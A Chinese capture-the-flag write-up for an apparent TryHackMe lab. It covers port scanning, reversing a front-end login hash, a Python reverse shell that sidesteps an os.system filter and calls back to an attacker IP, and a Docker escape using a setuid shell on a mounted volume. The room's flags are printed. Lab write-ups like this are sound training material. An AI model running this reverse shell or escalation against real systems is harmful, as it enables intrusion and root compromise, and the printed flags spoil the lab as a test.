端口扫描

sudo nmap --min-rate 10000 -p- 10.10.144.20 
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 13:55 CST
Nmap scan report for 10.10.144.20
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 10.10.144.20 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 13:56 CST
Nmap scan report for 10.10.144.20
Host is up (0.22s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f4:af:2f:f0:42:8a:b5:66:61:3e:73:d8:0d:2e:1c:7f (RSA)
| 256 36:f0:f3:aa:6b:e3:b9:21:c8:88:bd:8d:1c:aa:e2:cd (ECDSA)
|_ 256 54:7e:3f:a9:17:da:63:f2:a2:ee:5c:60:7d:29:12:55 (ED25519)
80/tcp open http Node.js Express framework
|_http-title: Python Playground!
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web

扫一下目录,找到一个admin.html,发现是一个admin的登陆界面。并且当我抓包时发现没有抓到,说明是前端JS验证,查看网页源代码。完全给出了登陆的验证方式。首先用户名是connor,其次是有两个函数,分别是把文本转数组和把数组转字符串,有自己的算法。写一个python脚本来逆向(好久没自己手撸脚本了QAQ)

hash='dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu'
def textToarray(hash):
array =[]
for c in hash:
code = ord(c)
array.append(code-97)
return array


def arrayTostring(array):
string=''
for i in range(0,len(array),2) :
string+= chr(array[i]*26+array[i+1])
return string

if __name__ == '__main__':
print (arrayTostring((textToarray((arrayTostring((textToarray(hash))))))))

输出结果是:spaghetti1245

成功登录!!!

Getshell

发现可以执行python脚本,但是有过滤一些命令比如说os.system

但是还是可以绕过,开启监听

socket = __import__("socket")
subprocess = __import__("subprocess")
os = __import__("os")

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.38.245",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call("/bin/bash")

成功得到shell!

python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm-color

发现我们是root???看了看房间的标签,我们应该是在docker中

flag1

THM{7e0b5cf043975e3c104a458a8d4f6f2f}

房间提示说我们需要找到一些凭证,我们nmap扫描提示有开启22端口,也许上面得到的凭证也能用于ssh,我早该想到的

果然如此,flag2

THM{69a36d6f9da10d23ca0dbfdf6e691ec5}

提权(docker逃逸)

现在我们拥有了一个docker的rootshell,还有一个宿主机的用户shell,怎么获取宿主机的rootshell呢?想到之前打的一个靶机,也许我们需要先找到docker容器的挂载点。在docker的shell中的/mnt/log目录创建一个hackme.txt

在宿主机中

find / -name hackme.txt 2>/dev/null

找到了挂载点/var/log/hackme.txt

在docker中(利用bash的话会提示缺少动态链接库)

cp /bin/sh /mnt/log
chmod +s /mnt/log/sh

宿主机中

./sh -p

成功提权

flag3

THM{be3adc69c25ad14eb79da4eb57925ad1}

碎碎念

非常有趣味性的靶机,在Web中需要一点点小逆向。然后docker逃逸什么的,总之思路是找到挂载点吧。